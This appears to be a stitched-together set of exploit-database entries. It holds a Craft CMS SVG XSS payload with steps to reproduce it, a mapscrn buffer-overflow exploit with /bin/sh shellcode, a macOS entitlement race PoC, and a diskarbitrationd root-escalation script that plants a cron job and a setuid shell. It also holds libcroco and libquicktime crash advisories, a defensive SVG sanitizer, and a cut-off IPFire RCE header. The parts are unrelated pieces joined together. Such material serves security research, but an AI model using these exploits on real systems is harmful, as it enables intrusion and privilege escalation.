<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>


[+] Manual steps to reproduce ..
1. Log in with the editor account (only privilege to edit news) in Craft CMS
2. Go to the 'add news' option: https://localhost/admin/entries/news/new
3. Put random values in the title
4. On your attacker machine, create a file named 'xss.svg' (without quotes) containing the payload shown above
5. Upload xss.svg via the featured image option in Craft CMS
6. Click Save
7. Now open: https://localhost/s/assets/site/xss.svg
8. The XSS payload executes and an alert pop-up shows the domain name
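A server-side check and sanitizer for this upload path, as an added Python example that is not Craft's code. It parses the advisory's xss.svg payload (embedded below as a constructed sample) with the standard library, reports the active content it finds (script and foreignObject elements, on* event attributes, href values with a javascript:, data: or other non-http scheme), and returns a copy with those parts stripped. The list of dangerous constructs is a practical starting point rather than a complete allowlist; for untrusted XML in production, parse through defusedxml (assumed to be installed) so that entity-expansion attacks are also blocked, and serve user-uploaded SVGs with Content-Disposition: attachment or from a separate origin so that a missed construct cannot run in the site's context.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)          # keep <svg xmlns=...> on re-serialisation
ET.register_namespace("xlink", XLINK_NS)

# Elements that carry executable or foreign (HTML) content; matched by local name.
ACTIVE_TAGS = {"script", "foreignobject"}
# URL schemes allowed in href/xlink:href; javascript:, data:, vbscript: etc. are dropped.
SAFE_SCHEMES = {"", "http", "https"}

# Constructed sample: the advisory's xss.svg payload.
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>
"""


def _local(name):
    """Strip the {namespace} prefix ElementTree puts on tags and attribute names."""
    return name.rsplit("}", 1)[-1].lower()


def _safe_url(value):
    # Browsers ignore whitespace and control characters when reading the scheme, so do the same.
    cleaned = re.sub(r"[\s\x00-\x1f]", "", value).lower()
    scheme = cleaned.split(":", 1)[0] if ":" in cleaned else ""
    return scheme in SAFE_SCHEMES


def find_active_content(svg_bytes):
    """List the reasons an uploaded SVG must be treated as active content ([] if clean)."""
    root = ET.fromstring(svg_bytes)
    if _local(root.tag) != "svg":
        return ["root element is <%s>, not <svg>" % _local(root.tag)]
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append("element <%s>" % tag)
        for name, value in el.attrib.items():
            attr = _local(name)                       # handles xlink:href as well
            if attr.startswith("on"):
                findings.append("event handler %s on <%s>" % (attr, tag))
            elif attr == "href" and not _safe_url(value):
                findings.append("unsafe href on <%s>: %s" % (tag, value[:40]))
    return findings


def sanitize_svg(svg_bytes):
    """Return the SVG with active elements/attributes removed (re-serialised without the DOCTYPE)."""
    root = ET.fromstring(svg_bytes)
    if _local(root.tag) != "svg":
        raise ValueError("not an SVG document")
    for parent in list(root.iter()):                  # snapshot: we mutate while walking
        for child in list(parent):
            if _local(child.tag) in ACTIVE_TAGS:
                parent.remove(child)
    for el in root.iter():
        for name in list(el.attrib):
            attr = _local(name)
            if attr.startswith("on") or (attr == "href" and not _safe_url(el.attrib[name])):
                del el.attrib[name]
    return ET.tostring(root, encoding="utf-8")


if __name__ == "__main__":
    print("findings:", find_active_content(POC_SVG))
    print(sanitize_svg(POC_SVG).decode())
```

Rejecting the upload when find_active_content returns anything is the safer policy for a CMS; sanitize_svg is for the case where editors legitimately need SVG assets and the stripped file is acceptable to them.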


Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]
            
# Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
# Tested on: GNU/Linux - Kali 2017.1 Release
#
# Description: Mapscrn ( Part of setfont ) 2.0.3
# The  mapscrn command loads a user defined output character mapping table into the console driver.
# The console driver may be later put into use user-defined mapping table mode by outputting a special
# escape sequence to the console device.
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Architecture: all
#
# Vendor homepage: http://ccross.msk.su
#
# Source and destination overlap in strcpy(0xbe95fc4c, 0xbe9610df)
# at 0x4831518: strcpy (vg_replace_strmem.c:506)
# by 0x10A71F: ??? (in /usr/bin/mapscrn)
# by 0x10933B: ??? (in /usr/bin/mapscrn)
# by 0x41414140: ???
#
# Invalid read of size 2
# at 0x488DFCA: getenv (getenv.c:84)
# by 0x48867AE: guess_category_value (dcigettext.c:1587)
# by 0x48867AE: __dcigettext (dcigettext.c:667)
# by 0x48855F5: dcgettext (dcgettext.c:47)
# by 0x109733: ??? (in /usr/bin/mapscrn)
# by 0x41414140: ???
# Address 0x41414141 is not stack'd, malloc'd or (recently) free'd
#
# Process terminating with default action of signal 11 (SIGSEGV)
# Access not within mapped region at address 0x41414141
# at 0x488DFCA: getenv (getenv.c:84)
# by 0x48867AE: guess_category_value (dcigettext.c:1587)
# by 0x48867AE: __dcigettext (dcigettext.c:667)
# by 0x48855F5: dcgettext (dcgettext.c:47)
# by 0x109733: ??? (in /usr/bin/mapscrn)
# by 0x41414140: ???


#!/usr/bin/env python3
import errno
import subprocess

junk = b"\x41" * 4880           # padding up to the saved return address (0x41414141 lands in EIP, see trace above)
esp = b"\xe0\xdf\xff\xbf"       # return address: stack address of the NOP sled, must be adjusted per target
nops = b"\x90" * 24             # NOP sled
shellcode = b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"  # i386 execve("/bin//sh")
buffer = junk + esp + nops + shellcode  # craft the oversized argument

try:
    print("[*] Mapscrn Stack-Based Buffer Overflow by Juan Sacco")
    print("[*] Please wait.. running")
    subprocess.call(["mapscrn", buffer])
except OSError as e:
    if e.errno == errno.ENOENT:
        print("Mapscrn not found!")
    else:
        print("Error executing exploit")
    raise
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1223

One way processes in userspace that offer mach services check whether they should perform an action on
behalf of a client from which they have received a message is by checking whether the sender possesses a certain entitlement.

These decisions are made using the audit token which is appended by the kernel to every received mach message.
The audit token contains, amongst other things, the sender's uid, gid, ruid, rgid, pid and pid generation number (p_idversion).

The canonical way which userspace daemons check a message sender's entitlements is as follows:

  audit_token_t tok;
  xpc_connection_get_audit_token(conn, &tok);
  SecTaskRef sectask = SecTaskCreateWithAuditToken(kCFAllocatorDefault, tok);

  CFErrorRef err;
  CFTypeRef entitlement = SecTaskCopyValueForEntitlement(sectask, CFSTR("com.apple.an_entitlement_name"), &err);

  /* continue and check that entitlement is non-NULL, is a CFBoolean and has the value CFBooleanTrue */

The problem is that SecTaskCreateWithAuditToken only uses the pid, not also the pid generation number
to build the SecTaskRef:

  SecTaskRef SecTaskCreateWithAuditToken(CFAllocatorRef allocator, audit_token_t token)
  {
    SecTaskRef task;

    task = SecTaskCreateWithPID(allocator, audit_token_to_pid(token));
    ...

This leaves two avenues for a sender without an entitlement to talk to a service which requires it:

a) If the process can exec binaries then they can simply send the message then exec a system binary with that entitlement.
   This pid now maps to the entitlements of that new binary.

b) If the process can't exec a binary (it's in a sandbox, for example) then exploitation is still possible if the process has the ability to
   crash and force the restart of a binary with that entitlement (a common case, e.g. via an OOM or NULL pointer deref in a mach service.)
   The attacker process has to crash and force the restart of an entitled process enough times to wrap the next free pid around, so that
   when it sends the request to the target and then forces the entitled process to crash, it can crash itself and have its pid reused by
   the respawned entitled process.

Scenario b) is not so outlandish, such a setup could be achieved via a renderer bug with ability to gain code execution in new renderer processes
as they are created.

You would also not necessarily be restricted to just being able to send one mach message to the target service as there's no
constraint that a mach message's reply port has to point back to the sending process; you could for example stash a receive right with
another process or launchd so that you can still engage in a full bi-directional communication with the target service even
if the audit token was always checked.

The security implications of this depend on what the security guarantees of entitlements are. It's certainly the case that this enables
you to talk to a far greater range of services as many system services use entitlement checks to restrict their clients to a small number
of whitelisted binaries.

This may also open up access to privileged information which is protected by the entitlements.

This PoC just demonstrates that we can send an xpc message to a daemon which expects its clients to have the "com.apple.corecapture.manager-access"
entitlement and pass the check without having that entitlement.

We'll target com.apple.corecaptured which expects that only the cctool or sharingd binaries can talk to it.

use an lldb invocation like:

  sudo lldb -w -n corecaptured

then run this poc and set a breakpoint after the hasEntitlement function in the CoreCaptureDaemon library.

You'll notice that the check passes and our xpc message has been received and will now be processed by the daemon.

Obviously attaching the debugger like this artificially increases the race window but by for example sending many bogus large messages beforehand
we could ensure the target service has many messages in its mach port queue to make the race more winnable.

PoC tested on MacOS 10.12.3 (16D32)
 */

// ianbeer
#if 0
MacOS/iOS userspace entitlement checking is racy

#endif

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#include <mach/mach.h>
#include <xpc/xpc.h>

/* exec the target binary with a full, blocking pipe as its stdout/stderr so that it
 * stalls on its first write and our pid stays alive, now backed by the entitled binary. */
void exec_blocking(char* target, char** argv, char** envp) {
  // create the pipe
  int pipefds[2];
  pipe(pipefds);

  int read_end = pipefds[0];   // deliberately never read: that is what makes the writer block
  int write_end = pipefds[1];
  (void)read_end;

  // make the pipe nonblocking so we can fill it
  int flags = fcntl(write_end, F_GETFL);
  flags |= O_NONBLOCK;
  fcntl(write_end, F_SETFL, flags);

  // fill up the write end
  int ret, count = 0;
  do {
    char ch = ' ';
    ret = write(write_end, &ch, 1);
    count++;
  } while (!(ret == -1 && errno == EAGAIN));
  printf("wrote %d bytes to pipe buffer\n", count-1);

  // make it blocking again
  flags = fcntl(write_end, F_GETFL);
  flags &= ~O_NONBLOCK;
  fcntl(write_end, F_SETFL, flags);

  // set the pipe write end to stdout/stderr
  dup2(write_end, 1);
  dup2(write_end, 2);

  execve(target, argv, envp);
  perror("execve");   // only reached if the exec failed
}

/* Connect to a mach service via XPC; the event handler just logs what comes back. */
xpc_connection_t connect_service(char* service_name){
  xpc_connection_t conn = xpc_connection_create_mach_service(service_name, NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);

  xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
    xpc_type_t t = xpc_get_type(event);
    if (t == XPC_TYPE_ERROR){
      printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
    }
    printf("received an event\n");
  });
  xpc_connection_resume(conn);
  return conn;
}

int main(int argc, char** argv, char** envp) {
  xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
  xpc_dictionary_set_string(msg, "CCConfig", "hello from a sender without entitlements!");

  xpc_connection_t conn = connect_service("com.apple.corecaptured");

  // the message is queued with our (unentitled) audit token ...
  xpc_connection_send_message(conn, msg);

  // ... then exec a binary with the entitlement to talk to that daemon, so that by the
  // time the daemon resolves our pid to a SecTaskRef it sees cctool's entitlements.
  // make sure it doesn't exit by giving it a full pipe for stdout/stderr
  char* target_binary = "/System/Library/PrivateFrameworks/CoreCaptureControl.framework/Versions/A/Resources/cctool";
  char* target_argv[] = {target_binary, NULL};
  exec_blocking(target_binary, target_argv, envp);

  return 0;
}
            
#!/bin/bash

# Sources: 
# https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc

if ! security authorize system.volume.internal.mount &>/dev/null; then
  echo >&2 "Cannot acquire system.volume.internal.mount right. This will not work."
  exit 1
fi

TARGET=/private/var/at
SUBDIR=tabs
DISK=/dev/disk0s1

TMPDIR=/tmp/pwn
mkdir -p $TMPDIR
cd $TMPDIR

cat << EOF > boom.c
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char ** argv) {
  assert(argc == 2);
  setuid(0);
  setgid(0);
  system(argv[1]);
}
EOF
clang boom.c -o _boom || exit 1

race_link() {
  mkdir -p mounts

  while true; do
    ln -snf mounts link
    ln -snf $TARGET link
  done
}

race_mount() {
  while ! df -h | grep $TARGET >/dev/null; do
    while df -h | grep $DISK >/dev/null; do
      diskutil umount $DISK &>/dev/null
    done
    while ! df -h | grep $DISK >/dev/null; do
      diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null
    done
  done
}

cleanup() {
  echo "Killing child process $PID and cleaning up tmp dir"
  kill -9 $PID
  rm -rf $TMPDIR
}

if df -h | grep $DISK >/dev/null; then
  echo >&2 "$DISK already mounted. Exiting."
  exit 1
fi

race_link &
PID=$!
trap cleanup EXIT
echo "Just imagine having that root shell. It's gonna be legen..."
race_mount

echo "wait for it..."
CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom"
rm -f /var/at/tabs/root
echo "* * * * *" "$CMD" > /var/at/tabs/root

while ! [ -e $TMPDIR/boom ]; do
  sleep 1
done

echo "dary!"
kill -9 $PID
sleep 0.1
$TMPDIR/boom "rm /var/at/tabs/root"
$TMPDIR/boom "umount -f $DISK"
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su"
            
libcroco multiple vulnerabilities
================
Author : qflb.wu
===============


Introduction:
=============
Libcroco is a standalone CSS2 parsing and manipulation library.
The parser provides a low-level, event-driven SAC-like API and a CSS object model-like API.
Libcroco also provides a CSS2 selection engine and an experimental XML/CSS rendering engine.


Affected version:
=================
0.6.12


Vulnerability Description:
==========================
1.
The cr_tknzr_parse_comment function in cr-tknzr.c in libcroco 0.6.12 can cause a denial of service (memory allocation error) via a crafted CSS file.


./csslint-0.6 --dump-location libcroco_0_6_12_memory_allocation_error.css


==21841==ERROR: AddressSanitizer failed to allocate 0x20002000 (536879104) bytes of LargeMmapAllocator: 12
...
==21841==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix.cc:68 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0)
    ...
    #10 0x7fd78c2fcb4d in cr_tknzr_parse_comment /home/a/Downloads/libcroco-0.6.12/src/cr-tknzr.c:462
    #11 0x7fd78c2fcb4d in cr_tknzr_get_next_token /home/a/Downloads/libcroco-0.6.12/src/cr-tknzr.c:2218
    #12 0x7fd78c356f6e in cr_parser_try_to_skip_spaces_and_comments /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:634
    #13 0x7fd78c368a43 in cr_parser_parse_stylesheet /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:2538
    #14 0x7fd78c368a43 in cr_parser_parse /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:4381
    #15 0x480a8e in sac_parse_and_display_locations /home/a/Downloads/libcroco-0.6.12/csslint/csslint.c:960
    #16 0x480a8e in main /home/a/Downloads/libcroco-0.6.12/csslint/csslint.c:1001
    #17 0x7fd78b397f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
    #18 0x47c95c in _start (/home/a/Downloads/libcroco-0.6.12/csslint/.libs/lt-csslint-0.6+0x47c95c)


Reproducer:
libcroco_0_6_12_memory_allocation_error.css
CVE:
CVE-2017-8834


2.
The cr_parser_parse_selector_core function in cr-parser.c in libcroco 0.6.12 can cause a denial of service (infinite loop and CPU consumption) via a crafted CSS file.


./csslint-0.6 --dump-location libcroco_0_6_12_infinite_loop.css


Reproducer:
libcroco_0_6_12_infinite_loop.css
CVE:
CVE-2017-8871


===============================


qflb.wu () dbappsecurity com cn


Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42147.zip
            
libquicktime multiple vulnerabilities
=====================================
Author : qflb.wu
=====================================


Introduction:
=============
The libquicktime package contains the libquicktime library, various plugins and codecs, along with graphical and command-line utilities used for encoding and decoding QuickTime files. It is useful for reading and writing files in the QuickTime format. The goal of the project is to enhance the library while remaining compatible with the Quicktime 4 Linux library.


Affected version:
=================
1.2.4


Vulnerability Description:
==========================
##################################
1.
The quicktime_read_moov function in moov.c in libquicktime 1.2.4 can cause a denial of service (infinite loop and CPU consumption) via a crafted mp4 file.


./lqtplay libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4


POC:
libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4
CVE:
CVE-2017-9122


###################################
2.
The lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service (invalid memory read and application crash) via a crafted mp4 file.


./lqtplay libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4


ASAN:SIGSEGV
=================================================================
==14254==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f31e6ae7185 sp 0x7ffed033a270 bp 0x0000006bdb50 T0)
==14254==WARNING: Trying to symbolize code, but external symbolizer is not initialized!
   #0 0x7f31e6ae7184 (/usr/local/lib/libquicktime.so.0+0x6c184)
   #1 0x49b1c6 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x49b1c6)
   #2 0x47fbaa (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fbaa)
   #3 0x7f31e43b2ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
   #4 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)


AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 ??
==14254==ABORTING


debug info:
Program received signal SIGSEGV, Segmentation fault.
...
Stopped reason: SIGSEGV
0x00007ffff7829185 in lqt_frame_duration (file=<optimized out>, track=<optimized out>, 
   constant=<optimized out>) at lqt_quicktime.c:1242
1242  return


POC:
libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4
CVE:
CVE-2017-9123


###################################
3.
The quicktime_match_32 function in util.c in libquicktime 1.2.4 can cause a denial of service (NULL pointer dereference and application crash) via a crafted mp4 file.


./lqtplay libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4


ASAN:SIGSEGV
=================================================================
==14359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe8af6b85d8 sp 0x7fff490cd4e0 bp 0x7fff490cd5b0 T0)
==14359==WARNING: Trying to symbolize code, but external symbolizer is not initialized!
   #0 0x7fe8af6b85d7 (/usr/local/lib/libquicktime.so.0+0x3605d7)
   #1 0x7fe8af68b566 (/usr/local/lib/libquicktime.so.0+0x333566)
   #2 0x7fe8af63c71a (/usr/local/lib/libquicktime.so.0+0x2e471a)
   #3 0x7fe8af3d1658 (/usr/local/lib/libquicktime.so.0+0x79658)
   #4 0x7fe8af3d84a8 (/usr/local/lib/libquicktime.so.0+0x804a8)
   #5 0x7fe8af3a95da (/usr/local/lib/libquicktime.so.0+0x515da)
   #6 0x47fad2 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fad2)
   #7 0x7fe8acc8fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
   #8 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)


AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 ??
==14359==ABORTING


debug info:
Program received signal SIGSEGV, Segmentation fault.
Stopped reason: SIGSEGV
0x00007ffff7b1d5d8 in quicktime_match_32 (_input=<optimized out>, 
   _output=<optimized out>) at util.c:874
874    if(input[0] == output[0] &&


POC:
libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4
CVE:
CVE-2017-9124


###################################
4.
The lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service (heap-buffer-overflow) via a crafted mp4 file.


./lqtplay libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4


=================================================================
==40038==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cd4 at pc 0x7f28959fc45f bp 0x7ffefd561530 sp 0x7ffefd561528
READ of size 4 at 0x602000009cd4 thread T0
   #0 0x7f28959fc45e in lqt_frame_duration /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242
   #1 0x49b1c6 in quicktime_print_info /home/a/Downloads/libquicktime-1.2.4/utils/common.c:138
   #2 0x47fbaa in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:996
   #3 0x47fbaa in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
   #4 0x7f28932c7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
   #5 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)


0x602000009cd4 is located 3 bytes to the right of 1-byte region [0x602000009cd0,0x602000009cd1)
allocated by thread T0 here:
   #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
   #1 0x7f2895cad7d0 in quicktime_read_stts /home/a/Downloads/libquicktime-1.2.4/src/stts.c:115


SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242 lqt_frame_duration
==40038==ABORTING


POC:
libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4
CVE:
CVE-2017-9125


###################################
5.
The quicktime_read_dref_table function in dref.c in libquicktime 1.2.4 can cause a denial of service (heap-buffer-overflow and application crash) via a crafted mp4 file.


./lqtplay libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4


=================================================================
==41637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009ce4 at pc 0x7f9cb9ad16e7 bp 0x7ffcf9a1e720 sp 0x7ffcf9a1e718
WRITE of size 1 at 0x602000009ce4 thread T0
   #0 0x7f9cb9ad16e6 in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69
   #1 0x7f9cb9ad3bdd in quicktime_read_dref /home/a/Downloads/libquicktime-1.2.4/src/dref.c:147
   #2 0x7f9cb9ad0388 in quicktime_read_dinf /home/a/Downloads/libquicktime-1.2.4/src/dinf.c:56
   #3 0x7f9cb9afdf09 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:220
   #4 0x7f9cb9afaa9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155
   #5 0x7f9cb9b4ff1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247
   #6 0x7f9cb9b0172a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221
   #7 0x7f9cb9896658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791
   #8 0x7f9cb989d4a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
   #9 0x7f9cb986e5da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
   #10 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
   #11 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
   #12 0x7f9cb7154ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
   #13 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)


0x602000009ce4 is located 12 bytes to the left of 1-byte region [0x602000009cf0,0x602000009cf1)
allocated by thread T0 here:
   #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
   #1 0x7f9cb9ad13ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66


SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69 quicktime_read_dref_table
==41637==ABORTING


POC:
libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4
CVE:
CVE-2017-9126


###################################
6.
The quicktime_user_atoms_read_atom function in useratoms.c in libquicktime 1.2.4 can cause a denial of service (heap-buffer-overflow and application crash) via a crafted mp4 file.


./lqtplay libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4


=================================================================
==41642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cb1 at pc 0x7f3aa15d47f3 bp 0x7ffc98430d00 sp 0x7ffc98430cf8
WRITE of size 1 at 0x602000009cb1 thread T0
   #0 0x7f3aa15d47f2 in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84
   #1 0x7f3aa1590bd8 in quicktime_read_stsd_video /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:557
   #2 0x7f3aa1594eb8 in quicktime_read_stsd_table /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:694
   #3 0x7f3aa158bd4d in quicktime_finalize_stsd /home/a/Downloads/libquicktime-1.2.4/src/stsd.c:336
   #4 0x7f3aa1566147 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:231
   #5 0x7f3aa1562a9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155
   #6 0x7f3aa15b7f1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247
   #7 0x7f3aa156972a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221
   #8 0x7f3aa12fe658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791
   #9 0x7f3aa13054a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
   #10 0x7f3aa12d65da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
   #11 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
   #12 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
   #13 0x7f3a9ebbcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
   #14 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)


0x602000009cb1 is located 0 bytes to the right of 1-byte region [0x602000009cb0,0x602000009cb1)
allocated by thread T0 here:
   #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
   #1 0x7f3aa15d451a in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:81


SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84 quicktime_user_atoms_read_atom
==41642==ABORTING


POC:
libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4
CVE:
CVE-2017-9127


###################################
7.
The quicktime_video_width function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service (heap-buffer-overflow and application crash) via a crafted mp4 file.


./lqtplay libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4


=================================================================
==10979==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009d00 at pc 0x7f36a1017a37 bp 0x7ffe65a90010 sp 0x7ffe65a90008
READ of size 4 at 0x602000009d00 thread T0
   #0 0x7f36a1017a36 in quicktime_video_width /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998
   #1 0x7f36a1017a36 in quicktime_init_maps /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1633
   #2 0x7f36a101af13 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1891
   #3 0x7f36a10204a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
   #4 0x7f36a0ff15da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
   #5 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
   #6 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
   #7 0x7f369e8d7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
   #8 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)


0x602000009d00 is located 4 bytes to the right of 12-byte region [0x602000009cf0,0x602000009cfc)
allocated by thread T0 here:
   #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
   #1 0x7f36a12543ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66


SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998 quicktime_video_width
==10979==ABORTING


POC:
libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4
CVE:
CVE-2017-9128




=================================


qflb.wu () dbappsecurity com cn


Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42148.zip
            
# 
# Title :  IPFire 2.19 Firewall Post-Auth RCE
# Date : 09/06/2017
# Author : 0x09AL (https://twitter.com/0x09AL)
# Tested on: IPFire 2.19 (x86_64) - Core Update 110
# Vendor : http://www.ipfire.org/
# Software : http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso
# Vulnerability Description:
